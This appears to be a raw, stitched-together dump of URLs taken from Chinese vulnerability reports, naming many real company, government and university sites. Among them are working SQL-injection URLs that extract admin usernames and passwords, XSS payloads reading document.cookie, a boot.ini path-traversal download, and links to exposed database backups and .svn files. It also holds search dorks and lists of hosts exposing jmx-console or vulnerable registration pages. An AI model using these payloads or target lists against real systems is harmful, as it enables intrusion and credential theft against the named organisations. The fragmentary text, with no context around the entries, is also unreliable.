http://www.hbsxmsysc.cn/page.php?act=news&id=24&idd=3292 http://www.hbcrjy.com/page.php?act=news&id=22&idd=589 http://www.sxbjamxh.com/page.php?act=news&id=22&idd=1001 http://www.ylscgyg.com/page.php?act=news&id=22&idd=751 http://www.ahcht.com/page.php?act=news&id=22&idd=935 http://www.hbdonjin.com/page.php?act=news&id=66&idd=556 http://rd.lieshan.gov.cn/page.php?act=news&id=24&idd=615 http://www.hbygjd.cn/page.php?act=news&id=22&idd=429 http://ahjjmp.l34.goodnic.net/page.php?act=news&id=22&idd=534 http://www.hbzdct.com/page.php?act=news&id=22&idd=576 http://www.ahrunshui.com/page.php?act=news&id=24&idd=626 http://www.mbawbfh.com/page.php?act=qie&id=60&idd=516 http://www.wangleigroup.com/page.php?act=news&id=22&idd=518 http://www.gaomeimuqiang.com/page.php?act=news&id=22&idd=531 http://www.hbbzy.net/page.php?act=news&id=22&idd=522 http://www.raiseschool.com/page.php?act=news&id=22&idd=467 http://www.wjwyxw.com/page.php?act=news&id=47&idd=550 http://yhjd123.com/page.php?act=news&id=22&idd=548 http://www.zhonghaost.com/page.php?act=news&id=22&idd=516 http://www.hz-ahu.com/page.php?act=news&id=22&idd=545 
http://www.ahlxbz.com/page.php?act=news&id=32&idd=461 http://www.huiqianzi.net/page.php?act=news&id=18&idd=459 http://hbsjdq.com/page.php?act=news&id=22&idd=499 http://www.0561dn.com/page.php?act=news&id=22&idd=504 http://www.ahtxgk.net/page.php?act=news&id=22&idd=546 http://www.hbkxdt.com/page.php?act=news&id=22&idd=563 http://te66.cn/page.php?act=news&id=22&idd=495 https://211.137.251.50:8443/config/app https://github.com/ijse/Drag2Happy/blob/8b50f2fa9d26133bf1b0c64fb1aeaed92f4c2abb/old-version/sendMail.py http://172.16.0.134/bugfree/install/ http://www.Xiao5u.com/ http://www.Xiao5u.com/Demo/Company http://kami.sududa.com/tiqu/Tiqo.aspx?OrderID=703031234437911&Customer=malao002 http://kami.sududa.com/tiqu/Tiqo.aspx?OrderID=703031234437911&Customer=malao002 http://exe.sududa.com/exe/AgentManage.aspx http://exe.sududa.com/exe/SiteRead.aspx?Name=53322380@qq.com根据之前抓包的参数,?Name=xxxxxxxx@qq.com随便乱试了几个文件,发现有个文件好像可以读取代理商的信息。 http://exe.sududa.com/exe/TenpayShow.aspx android:versionCode="5730 android:versionName="5.7.3.0 http://www.xanet.net/case.php http://bbs.cndns.com//faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20%28select%20%28select%20concat%28username,0x27,password%29%20from%20cdb_members%20limit%201%29%20%29%20from%20%60information_schema%60.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23 http://bbs.sitestar.cn/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20%28select%20%28select%20concat%28username,0x27,password%29%20from%20cdb_members%20limit%201%29%20%29%20from%20%60information_schema%60.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23 http://union.ly.com/project http://union.ly.com/,泄露联盟应用编辑页面,未授权访问,并可直接添加应用,涉及几百个同程网合作商。 http://58.68.245.5/ 
http://www.trhos.com/xyxyy/tr1403_content.asp?id=19 http://www.henansclf.org/web.rar http://www.henansclf.org/admin_in/webbjq/ http://sys.zs91.com/user/index http://www.jingtiangroup.com/about.php?id=7 http://www.jingtiangroup.com/product.php?sec_id=3001 http://www.jingtiangroup.com/news_info.php?id=17 http://www.jingtiangroup.com/news.php?sec_id=2001 http://www.ahtcfy.com/news.php?sec_id=2003 http://www.ahtcfy.com/about.php?id=7 http://www.ahtcfy.com/product.php?sec_id=9002 http://www.ahtcfy.com/news_info.php?id=430 http://www.ahjinniu.com/about.php?id=13 http://www.ahjinniu.com/product.php?sec_id=3001 http://www.ahjinniu.com/news.php?sec_id=2001 http://www.ahjinniu.com/news_info.php?id=113 http://www.wendujx.com/about.php?id=8 http://www.wendujx.com/news_info.php?id=47 http://www.wendujx.com/news.php?sec_id=2001 http://www.wendujx.com/product.php?sec_id=3001 http://ahwf.com.cn/product.php?sec_id=3007 http://ahwf.com.cn/news.php?sec_id=2001 http://ahwf.com.cn/about.php?id=1 http://ahwf.com.cn/news_info.php?id=111 http://banbeishui.com/news_info.php?id=450 http://banbeishui.com/about.php?id=2 http://banbeishui.com/news.php?sec_id=2026 http://www.lmssp.com/product.php?sec_id=3001 http://www.lmssp.com/news.php?sec_id=2006 http://www.lmssp.com/about.php?id=27 http://www.lmssp.com/news_info.php?id=249 http://www.tcantong.com/news_info.php?id=15 http://www.tcantong.com/about.php?id=2 http://www.tcantong.com/news.php?sec_id=2001 http://www.tcantong.com/product.php?sec_id=3001 http://www.huijincw.com/about.php?id=3 http://www.huijincw.com/news_info.php?id=30 http://www.huijincw.com/news.php?sec_id=2001 http://www.ahtcqx.cn/about.php?id=3 http://www.ahtcqx.cn/news_info.php?id=23 http://www.ahtcqx.cn/news.php?sec_id=2002 http://www.ahxinghua.com/news_info.php?id=46 http://www.ahxinghua.com/product.php?sec_id=3001 http://www.ahxinghua.com/news.php?sec_id=2001 http://www.ahxinghua.com/about.php?id=4 http://ahjszs.cn/news_info.php?id=4 http://ahjszs.cn/product.php?sec_id=3001 
http://ahjszs.cn/news.php?sec_id=2001 http://ahjszs.cn/about.php?id=10 http://www.onefine.cn/product.php?sec_id=3001 http://www.onefine.cn/about.php?id=8 http://www.onefine.cn/news_info.php?id=173 http://www.onefine.cn/news.php?sec_id=2001 http://tchysj.com/about.php?id=3 http://tchysj.com/news.php?sec_id=2001 http://tchysj.com/product.php?sec_id=3001 http://www.qilongyou.com/about.php?id=2 http://www.qilongyou.com/news.php?sec_id=2001 http://www.qilongyou.com/news_info.php?id=97 http://111.202.**.**/login.php,发现账号里的钱已经用光了。 http://bbs.bee2c.com/uc_server http://gallery.artxun.com/index.php?module=gallery&act=edgallery&iid=101480&m=works&searchtype=1&keyword= http://demo.crm123.cn/Login.php登录系统 http://demo.crm123.cn/upload.php http://analytics.coolyun.com/analytics/Login.action http://www.ikang.com/ikang_app/ http://sh.loanchina.com//NewsStat/ http://www.loanchina.com/NewsStat/ http://123.139.154.143/tclc/index.jsp http://funds.money.hexun.com/fundsdata/compare/data22.aspx?s_id=2393&link_str=open&filter_str=&order_str=fld_sumvalue%20desc&start_date=2012-12-15 http://funds.money.hexun.com/fundsdata/compare/data22.aspx?s_id=2393&link_str=open&filter_str=&order_str=fld_sumvalue%20desc&start_date=2012-12-15'%20and%20'1'='1 http://funds.money.hexun.com/fundsdata/compare/data22.aspx?s_id=2393&link_str=open&filter_str=&order_str=fld_sumvalue%20desc&start_date=2012-12-15'%20and%20'2'='1 com:116.255.143.131的 dede:20130922 http://bj.tuan800-inc.com9=3 http://cd.tuan800-inc.com9=3 http://cs.tuan800-inc.com9=3 http://club.189.cn http://agent.sc.189.cn/apk/ http://agent.sc.189.cn/apk/%cb%c4%b4%a8%b5%e7%d0%c5%d2%c6%b6%af%ca%dc%c0%ed%cf%b5%cd%b3%ba%f3%cc%a8%c5%e4%d6%c3%b2%d9%d7%f7%c5%e0%d1%b5%ca%d3%c6%b50602.wmv http://61.188.4.249:8080/ http://61.188.4.249:8080/chengdu/login.action http://61.188.4.249:8080/4g/login.action http://61.188.4.249:8080/4g/itv/businessdetail/detail.action?businessDetailId=13为例子 
http://shop.jx.189.cn/common/search_filterIndex.action?query_object_id=9&shop_category_id=100008%22/%3E%3C/div%3E%3Cimg%20src=x http://shop.jx.189.cn/common/search_enter.action?searchProductInfo.method=search&searchProductInfo.proName=%27asd%22/%3E%3Csvg/onload=alert http://shop.jx.189.cn/common/search_enter.action?searchProductInfo.method=search&searchProductInfo.proName=%22/%3E%3Csvg/onload=alert%281%29%3E http://shop.jx.189.cn/common/search_enter.action?searchProductInfo.method=type&searchProductInfo.productTypeId=%22/%3E%3Csvg/onload=alert http://shop.jx.189.cn/common/search_enter.action?searchProductInfo.method=search&searchProductInfo.proName=&searchProductInfo.orderDesc= http://shop.jx.189.cn/common/search_filterIndex.action?query_object_id=2&shop_category_id=100001%22/%3E%3Csvg/onload=alert http://shop.jx.189.cn/search/searchNumber.action http://shop.jx.189.cn/web/web/bagsBuy_set_index.action?productId=3935%22/%3E%3Csvg/onload=alert%28/x/%29%3E&optionalId=302&groupBuyFlag=true http://shop.jx.189.cn/web/web/bagsBuy_set_index.action?productId=3935%22/%3E%3Csvg/onload=alert%281%29%3E&optionalId=302&groupBuyFlag=true http://shop.ehuatai.com/pages/member/loginQueryPlicy.action http://ctyun.cn http://ccl.pku.edu.cn:8080/pos/Implication/administrator.jsp http://www.immomogame.com/mmzb/ https://game.immomo.com/register/?action=loginHorizontalPage https://game.immomo.com/register/?action=loginPage https://game.immomo.com/register/?action=login&uname= http://kf.bestpay.com.cn/zhij/imsystem/js/im-client.js http://kf.bestpay.com.cn/zhij/imsystem/js/ajax.js http://kf.bestpay.com.cn/zhij/imsystem/js/jquery.js http://XXXXX/Xsweb/_data/index_QueryStu.aspx http://www.runmain.cn/ http://lbs.189.cn/caches/bakup/default/phpcmstables_20130409_2817_1.sql http://lbs.189.cn/caches/bakup/default/phpcmstables_20130312_1791_1.sql http://lbs.189.cn/caches/bakup/default/PHPCMS~1.SQL http://lbs.189.cn/caches/bakup/default/PHPCMS~2.SQL http://lbs.189.cn/caches/bakup/default/PHPCMS~3.SQL 
http://lbs.189.cn/caches/bakup/default/PHPCMS~4.SQL www.m10060.com http://www.m10060.com/common/manager/ http://www.m10060.com/common/phone/login.jsp http://www.sjzz.org.cn/ http://**.**.**/cjcx2/search.aspxexamsort=85&examdate=201405 http://1.85.59.22:8881/cjcx2/result.aspx?zj=8514611111 http://1.85.59.22:8881/cjcx2/result.aspx?zj=8514619999 www.ln10060.com http://www.ln10060.com/phone/login.jsp http://www.ln10060.com/manager/ http://www.ihs.ac.cn/cPI.asp?id=98 http://www.ihs.ac.cn/cPI.asp http://www.ihs.ac.cn/admin.asp http://www.ihs.ac.cn/bbs/data/dvbbs7.mdb http://111.75.198.119:9718/login.aspx http://www.hhmzw.com/xinxi/printpage.asp?id=993 http://218.85.65.35:9081/esa_web/jsp/service/news_mgr/NewsAction.do?ACTION_TYPE=detailNews&NEWS_ID=6736 http://218.85.65.35:9081/esa_web/jsp/service/news_mgr/.svn/entries http://218.85.65.35:9081/esa_web/jsp/ http://218.85.65.35:9081/esa_web/jsp/admin/scenic_area/new.jsp http://www.zgtzcs.com/ https://media.dreamhost.com/mp4/player.swf https://media.dreamhost.com/mp4/player.swf?debug=alert http://wzb.hebtu.edu.cn http://wzb.hebtu.edu.cn/zhengbing.php?id=24 http://www.seekfilm.com.cn/index.php/Member/orderShow/order_id/5100/ http://www.cdyjy.uestc.edu.cn http://www.cdyjy.uestc.edu.cn/phpmyadmin http://stock2.finance.sina.com.cn/sf/api/jsonp.php/aaa=johansen082447293183438691409578322670/dataService.getNoticeList?type=%E5%85%B6%E4%BB%96&index=1&court=&pageNum=undefined http://admin.ehaoyao.com/api.php http://www.qlcg.gov.cn/plus/recommenusdz.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@%60\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60%20limit+0,1%29,5,6,7,8,9%23@%60\%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=6878 http://www.qlcg.gov.cn/data/目录,发现存在列目录漏洞 http://zone.wooyun.org/content/14945 POC:http://x55.me/cpframe0002.htm http://www.seekfilm.com.cn http://219.159.69.132/ 
http://219.159.69.132/sys/jigouzhanghu_add.aspx http://219.159.69.132/sys/xitongzhanghu_edit.aspx http://219.159.69.132/childpage/showfile.aspx?filepath=F:\\DeclareWeb\\WebFile\\UploadData\Downloads\2009841447312037.doc http://219.159.69.132/childpage/showfile.aspx?filepath=F:\\DeclareWeb\\WebFile\\images\img2\cbtntypbg.aspx http://60.30.247.222/sys/jigouzhanghu_add.aspx http://219.133.95.115/DS/sys/jigouzhanghu_add.aspx http://www.seekfilm.com.cn/index.php/ http://www.seekfilm.com.cn/index.php/Service/serviceCz/ http://www.seekfilm.com.cn/index.php/Member/address/id/87/ http://www.seekfilm.com.cn/index.php/Member/address/id/85/ http://www.jikexueyuan.com/study/170/lid/2.html http://bbs.eduu.com/forum.php?mod=viewthread&tid=2945802&pid=41432065&page=1&extra=#pid41432065 http://www.seekfilm.com.cn http://www.118320.com/cring/jsp/user/listener.jsp?ringId=135&type=1 http://www.sqlmap.org www.118320.com\session http://tg.tttuangou.net/changelog.txt http://tg.tttuangou.net/?mod=account&code=register http://oa.shunhengli.com:9090/witapprovemanage/report/depReimburse.jsp?depid=1 http://oa.shunhengli.com:9090/witapprovemanage/report/depReimburse.jsp?depid=1 http://oa.hzuf.com:9090/system/monitorright/monitor_right_add.jsp?id=1 http://oa.hzuf.com:9090/system/monitorright/monitor_right_add.jsp?id=1 http://oa.shunhengli.com:9090/witapprovemanage/report/depReimburse.jsp?depid=1 http://oa.hzuf.com:9090/witapprovemanage/report/depReimburse.jsp?depid=1 http://oa.chnjcdc.com:9090/witapprovemanage/report/depReimburse.jsp?depid=1 http://115.29.234.197:8090/witapprovemanage/report/depReimburse.jsp?depid=1 http://119.145.194.122:9090/witapprovemanage/report/depReimburse.jsp?depid=1 http://oa.hzuf.com:9090/system/monitorright/monitor_right_add.jsp?id=1 http://oa.shunhengli.com:9090/system/monitorright/monitor_right_add.jsp?id=1 http://oa.chnjcdc.com:9090/system/monitorright/monitor_right_add.jsp?id=1 http://115.29.234.197:8090/system/monitorright/monitor_right_add.jsp?id=1 
http://119.145.194.122:9090/system/monitorright/monitor_right_add.jsp?id=1 http://wenming.chinadaily.com.cn/News.aspx?sole=20140617174150703 http://wenming.chinadaily.com.cn/Single.aspx?sole=20140225121519187 http://wenming.chinadaily.com.cn/Single.aspx?sole=20140225121519187 http://job.ehuatai.com/hr/app/basic/resume.jsp?Job=20121030115009721512848&language=cn https://obooking.ctrip.com/oBooking/Order/Hotel/ViewOrder.asp?OrderID={携程订单号 http://www.tophr.net/news/index.asp?id=16364 http://9yang.bbs.woniu.com/forum.php?mod=viewthread&tid=4179&page=1&extra=#pid396225 http://event.shop.wanmei.com/qtshop/qtShopLoginAction.do http://event.shop.wanmei.com http://www.shenyangbus.com/ http://cl.chinaccd.net/cms/jieshao.php?jsid=1 http://cl.chinaccd.net/cms/article.php?action=show&id=110 http://www.hnmz.gov.cn/new/cms/jieshao.php?jsid=2 http://www.hnmz.gov.cn/new/cms/article.php?action=show&id=2481 http://www.cjpmp.com/cms/jieshao.php?jsid=2 http://www.cjpmp.com/cms/article.php?action=show&id=5 http://sh.chinaccd.net/new/cms/jieshao.php?jsid=2 http://sh.chinaccd.net/new/cms/article.php?action=list&typeid=2 http://tjj.chinaccd.net/renkou/cms/article.php?action=show&id=60 http://oa.kjkd.com http://202.38.193.235/zhinan/preLogin/login.aspx http://wooyun.org/bugs/wooyun-2010-061543 google:inurl:custom/CompanyCGList.aspx?ComId= http://baike.baidu.com/view/5293437.htm?fr=aladdin http://eps.alnan.com.cn/custom/CompanyCGList.aspx?ComId=1 http://eps.sinoma-cem.cn/custom/CompanyCGList.aspx?ComId=1 http://www.qlszb.com/custom/CompanyCGList.aspx?ComId=1 http://2013.autodesk.com.cn对应的服务器IP地址:http://42.96.185.28/ http://42.96.185.28/.svn/entries http://club.xincheping.com/index.php?a=AjaxXcp.AjaxCheckOldPwd http://www.chinaamc.com/zcms/Services/VoteResult_ZXLC_XDY.jsp http://qsmy.coco.cn/strategy/detail.php?id=9760 http://qsmy.coco.cn/strategy/detail.php?id=8041 http://qsmy.coco.cn/strategy/list.php?ser=%3D 
http://stock.finance.sina.com.cn/box/api/openapi.php/MoneyFinanceFundInfoService.fundcompare?code=000198 http://cblog.chinadaily.com.cn/home.php?mod=space&uid=1619413&do=blog&quickforward=1&id=4564841 http://xx.com\x22\x3e\x3c\x69\x66\x72\x61\x6d\x65\x20\x6f\x6e\x6c\x6f\x61\x64\x3d\x61\x6c\x65\x72\x74\x28\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x6f\x6f\x6b\x69\x65\x29\x3e/1.swf[/flash http://msdn.microsoft.com/en-us/library/ms682425.aspx http://rus.autonavi.com/login.action http://www.hacjda.gov.cn/upload/Index.asp http://www.hacjda.gov.cn/upload/uploadfile/1.cer www.ibeifeng.com,ecshop系统 soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xmlns:xsd="http://www.w3.org/2001/XMLSchema xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/ soap:Body http://sys.zs91.com soap:Body soap:Envelope soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xmlns:xsd="http://www.w3.org/2001/XMLSchema xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/ soap:Body http://sys.zs91.com soap:Body soap:Envelope soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xmlns:xsd="http://www.w3.org/2001/XMLSchema xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/ soap:Body http://sys.zs91.com soap:Body soap:Envelope soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xmlns:xsd="http://www.w3.org/2001/XMLSchema xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/ soap:Body http://sys.zs91.com soap:Body soap:Envelope http://cvopen.chevip.com/ http://ops.ikang.com www.jnslyy.com/ShowAnn.asp?id=50 http://api3.hahapinche.com/api.php/Mobile/Html/my_score?user_id=39114 http://api3.hahapinche.com/api.php/Mobile/Html/my_score?user_id=39113 api.php/Mobile/Sign/sign_up http://v.umiwi.com/lib/play/?albumid=1120&id=6891 http://mail.meizu.com/ http://www.xxx.com/skywcm/webpage/download.jsp?absolutePath=C:%5Cboot.ini&downFileName=boot.ini http://www.njsports.gov.cn/skywcm/webpage/download.jsp?absolutePath=C:%5Cboot.ini&downFileName=boot.ini 
http://shop.jx.189.cn/web/policyDetailByUnitId.action?uniteId=827%27%20and%20%271%27=%271%27%20--%29 http://111.13.53.76:8090/ http://www.timber2005.com/ http://www.timber2005.com/Customer.html inurl:stu_user_regist.aspx http://www.ndddpx.com/system/stu_user_regist.aspx http://www.fjforestry.gov.cn:38501/System/Stu_User_Regist.aspx http://www.jzkjpx.cn/system/stu_user_regist.aspx http://zx.gzzkzsw.com/system/stu_user_regist.aspx http://exam.sccl.org.cn/system/stu_user_regist.aspx http://218.70.91.227/System/Stu_User_Regist.aspx http://42.96.174.127/system/stu_user_regist.aspx http://116.228.52.53/system/stu_user_regist.aspx http://www.lzpcc.com.cn/jxjy-exam/system/stu_user_regist.aspx http://ajws.gov.cn/system/stu_user_regist.aspx http://www.jmty.com.cn:8000/system/stu_user_regist.aspx http://www.pzxf.gov.cn/system/stu_user_regist.aspx www.ctcefive.com/ks/system/stu_user_regist.aspx http://exam.sohomusic.com.cn:86/system/stu_user_regist.aspx http://www.ncszfcg.gov.cn:8002/system/stu_user_regist.aspx http://px3.timber2005.com/System/Stu_User_Regist.aspx http://www.52edu.org/system/stu_user_regist.aspx http://px.mqxwdx.cn/System/Stu_User_Regist.aspx http://zxks.sdcoal.gov.cn/system/stu_user_regist.aspx http://219.150.186.78:91/Exam/system/stu_user_regist.aspx exam.iflysse.com/system/stu_user_regist.aspx test.pche.com.cn/system/stu_user_regist.aspx victormap.com/system/stu_user_regist.aspx px.fjzyjy.com/system/stu_user_regist.aspx www.haryk.com/system/stu_user_regist.aspx www.touhang123.com/system/stu_user_regist.aspx www.rcjxjy.com/system/stu_user_regist.aspx www.qkjx.qdedu.net:8012/PXSystem/Stu_User_Regist.aspx www.frpx.cn/system/stu_user_regist.aspx zx.shoueredu.com/system/stu_user_regist.aspx www.bjlfzg.com/system/stu_user_regist.aspx exam.sinopx.cn/system/stu_user_regist.aspx goldexam.com/system/stu_user_regist.aspx http://localhost/admin_sponsor.php inurl:wapindex.aspx http://kelink.com/ www.wapzz.cn做例子 
www.wapzz.cn/admin/addTopWAPALL.aspx?path=360%E5%BA%93%E5%B8%A6%E8%AE%A1%E5%88%92&action=gomod&classid=0 www.wapzz.cn http://wapzz.cn/bbs/userguessbook.aspx?action=search&siteid=1000&classid=0&touserid=1835 http://www.xiangtan.gov.cn/comm/xiangtan_hd/shizhangxinxiang/szxx_hit.jsp?id=21833 http://www.xiangtan.gov.cn/login.jsp http://123.125.99.115//getSource.jsp?bq_name=-1 http://61.135.173.165/pingan/card/import/employee.csv http://www.ztehotel.com/admin/index.asp http://210.21.236.173/images/dm.aspx http://msdn.microsoft.com/en-us/library/ms682425.aspx http://123.125.97.103/index.jsp http://113.108.186.80/admin/login.asp URL:110.52.11.189:8080/systemAction!login.action inurl:/printpage.asp?ArticleID https://www.91wutong.com/index.php/home/dianzihetong/8/101000/1077/1000 http://www.szcw.cn/dealer/hr.php?id=259 http://211.99.221.166/ http://www.ahpfpc.gov.cn/ http://www.ahpfpc.gov.cn/page.php?fp=sch&key=0 www.t3.com.cn http://61.191.25.190/ http://www.gxjx.gov.cn:8080/gxjx/login.html http://211.144.20.169/cwfcbase/page/doLogin.action http://221.176.36.75:8081/login.jsp http://sgbbs.pps.tv/forum.php http://bfmnzbbs.pps.tv/forum.php http://qmdahbbs.pps.tv/forum.php http://bhzrbbs.pps.tv/forum.php http://114.255.181.72/news.do?action=detail&id=201409010337297127 http://dealer.chewen.com/1191/active/?carModelId=1%27 http://kj.ecp888.com/Silic.jsp www.hzqx.com/xlypt/Login.aspx http://bbs.smartisan.cn/home.php?mod=space&uid=1 http://bbs.smartisan.cn/uc_server/admin.php?m=user&a=login&iframe=&sid= www.aol.com邮箱漏洞存在点在信头区域,如下图: http://www.xxx.com/general/email/new/index.php?EMAIL_ID=7 http://eoffice8.weaver.cn:8028/general/email/new/index.php?EMAIL_ID=9503 http://eoffice8.weaver.cn:8028/general/email/new/index.php?EMAIL_ID=9504 http://www.sjd-logistics.com:8000/general/email/new/index.php?EMAIL_ID=726155 http://www.sjd-logistics.com:8000/general/email/new/index.php?EMAIL_ID=726152 http://www.xxoo.com/ikernel/admin/ http://www.xxx.com/ikernel/admin/IK_TABLE/field/?TABLE_ID=9 
http://www.zjsme.gov.cn/1.txt http://www.zjrzfy.gov.cn/ http://www.zjzy.gov.cn/ http://www.jsjrfy.gov.cn/ http://www.njng.gov.cn/ http://www.jsrepc.com/ http://www.sundy-whcy.com/ http://www.njlsjjjc.gov.cn/溧水纪检监察网 http://www.jzscxh.com/ http://www.jnkjj.gov.cn/江宁科技局 http://www.jszlyy.com.cn/江苏省肿瘤医院 http://cxy.jnkjj.gov.cn/江宁区产学研合作信息网 http://www.jnkjj.gov.cn:80/ www.jnkjj.gov.cn inurl:etax2006 http://202.100.197.38:7009/etax2006/manage/index.htm http://182.151.197.163:8001/etax2006/manage/index.htm http://wssb.dlntax.gov.cn/etax2006/manage/index.htm http://dealer.chewen.com/1172/active/?carModelId=1521 http://www.sqlmap.org http://wuxi.eda.ac.cn/backend/base.php页面下的cookie中的DAUFzOmsgzusername参数。 site:chewen.com inurl:webtest.html www.chewen.com/admin/webtest.html http://page.renren.com/600002275 http://58.214.233.113:8800 http://www.timber2005.com/ http://www.timber2005.com/Customer.html http://t.cntv.cn/ http://adm.phpad.cn/admin/login.php http://www.speiyou.com/ http://sbj.speiyou.com/classes/view/ff80808144b18acb0144ba2ad1a33047 http://web.7k7k.com/s.php web.7k7k.com/games/download.php?from=1865135&url=http://www.wooyun.org http://tts.ytoxl.com/stockout/order-searchOrder.htm http://bbs.49you.com/ http://cgb.faw.com.cn/chaxun.asp?theID=40 inurl:/ycportal http://vehicle.zhonghuacar.com/huachenzhijia/shangwu/zhonghua/index.asp http://city.china.com/zhaoshang/ http://srm.geely.com/web/su/supplier/registerSupplierAttach.do?supplierItem=30 http://aid.ec.js.edu.cn/infoms/visitor/dcjyZxsq-bfxx201201.c www.jumei.com http://csm.eerong.com/login.action http://club.bankcomm.com/customer/productinfo/search.html?keyword=abcdefgh%22%29%29}a}%0D;alert%28document.cookie%29%0D%2F%2F http://www.ahcss.gov.cn/list/index.php?pid=4 http://www.heiyan.com/manage/client/feedback/179631 inurl:MessageBoard/Default.aspx http://www.dletyy.com/MessageBoard/Default.aspx?Page=368 http://www.baotiegroup.cn/MessageBoard/Default.aspx http://www.semi-chip.com/MessageBoard/Default.aspx?Page=4 
http://changfenggardenhotel.com/MessageBoard/Default.aspx?Page=1 http://www.tianlaihotel.com/messageboard/Default.aspx?Page=1 http://www.yttijian.cn/MessageBoard/Default.aspx http://www.bsacn.com/MessageBoard/Default.aspx http://www.semi-chip.com/MessageBoard/Default.aspx?Page=4 http://econ.ruc.edu.cn/teacher_js.php?id=2257 http://youxi.kankan.com/list/?sort=update&typeid=8&styleid=9%22/%3E%3C/a%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div http://youxi.kankan.com/list/?typeid=2&sort=updatedd%22%3E%3C/a%3E%3Cscript%3Ealert%281%29%3C/script%3E http://youxi.kankan.com/list/?sort=update&typeid=8&styleid=9%22%3E%3C/a%3E%3Cimg%20src=x%20onerror=alert%281%29%3E http://youxi.kankan.com/list/?typeid=2&sort=update%22%3E%3C/a%3E%3Cscript%3Ealert%281%29%3C/script%3E http://youxi.kankan.com/list/?typeid=5&nameid=1%22%3E%3C/a%3E%3Cimg%20src=x%20onerror=alert%281%29%3E http://youxi.kankan.com/list/?sort=update&typeid=8&styleid=9%22%3E%3C/a%3E%3Cscript%3Ealert%281%29%3C/script%3E http://youxi.kankan.com/list/?sort=update&typeid=1%22%3E%3C/a%3E%3Cscript%3Ealert%281%29%3C/script%3E http://youxi.kankan.com/list/?sort=hits%22%3E%3C/a%3E%3Cscript%3Ealert%281%29%3C/script%3E http://youxi.kankan.com/list/?nameid=1%22%3E%3C/a%3E%3Cscript%3Ealert%28/x/%29%3C/script%3E http://youxi.kankan.com/list/?sort=update&nameid=111%22%3E%3C/a%3E%3Cscript%3Ealert%281%29%3C/script%3E http://youxi.kankan.com/list/?typeid=5%22%3E%3C/a%3E%3Cscript%3Ealert%281%29%3C/script%3E http://youxi.kankan.com/list/?nameid=136&sort=update%22%3E%3C/a%3E%3Cscript%3Ealert%28/x/%29%3C/script%3E http://youxi.kankan.com/list/?artistid=1%22%3E%3C/a%3E%3Cscript%3Ealert%281%29%3C/script%3E http://youxi.kankan.com/list/?typeid=5&styleid=8%22%3E%3C/a%3E%3Cimg%20src=x%20onerror=alert%281%29%3E www.melearning.net ttp://exam.sccl.org.cn/system/stu_user_regist.aspx http://ajws.gov.cn/system/stu_user_regist.aspx http://www.fjforestry.gov.cn:38501/System/Stu_User_Regist.aspx 
http://www.qkjx.qdedu.net:8012/PXSystem/Stu_User_Regist.aspx http://61.147.105.168:8003/PXSystem/Stu_User_Regist.aspx http://zy.52edu.org/PXSystem/Stu_User_Regist.aspx http://exam1.timber2005.com/system/stu_user_regist.aspx http://px3.timber2005.com/System/Stu_User_Regist.aspx http://61.147.105.168:8010/system/stu_user_regist.aspx http://www.rcjxjy.com/system/stu_user_regist.aspx http://www.frpx.cn/system/stu_user_regist.aspx http://www.fjforestry.gov.cn:38501/System/Stu_User_Regist.aspx http://www.jzkjpx.cn/system/stu_user_regist.aspx http://www.fjforestry.gov.cn:38501/system/stu_user_regist.aspx http://www.fjforestry.gov.cn:38501/login.aspx http://www.fjforestry.gov.cn:38501/usercontrol/ajax.aspx http://wooyun.org/bugs/wooyun-2010-053752 http://223.68.141.131 www.renwuyi.com http://baike.baidu.com/view/12975094.htm?fr=aladdin http://pcedu.pconline.com.cn/457/4572860.html http://www.headnews.cn/2014/0903/408866.shtml http://www.baidu.com/s?ie=utf-8&f=8&rsv_bp=1&ch=3&tn=90668161_hao_pg&bar=&wd=%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2+news&rsv_enter=1&rsv_sug3=15&rsv_sug4=683&rsv_sug2=0&inputT=2584 http://www.renwuyi.com/register.html http://www.renwuyi.com/single_suggest.html http://www.renwuyi.com/single_suggest.html www.xxxx.com/suggest.html inurl:edoas2/oa.jsp http://218.22.26.133/jmx-console/ http://oa.masedu.cn/jmx-console/ http://218.22.18.154/jmx-console/ http://220.178.254.174/jmx-console/ http://off.whedu.net:8000/jmx-console/ http://218.23.26.78:8000/jmx-console/ http://220.178.77.251:88/jmx-console/ http://218.22.181.220/jmx-console/ http://oa.ahfyjy.com:8088/jmx-console/ http://oa.aqtc.edu.cn/jmx-console/ http://www.aqdg.com:8080/jmx-console/ http://edoas.ahyky.com/jmx-console/ http://202.116.45.214/jmx-console/ http://219.129.189.242/jmx-console/ http://oazw.hsyxedu.cn/jmx-console/ http://218.14.214.239/jmx-console/ http://121.8.214.87/jmx-console/ http://121.15.218.196/jmx-console/ http://220.178.254.174/jmx-console/ 
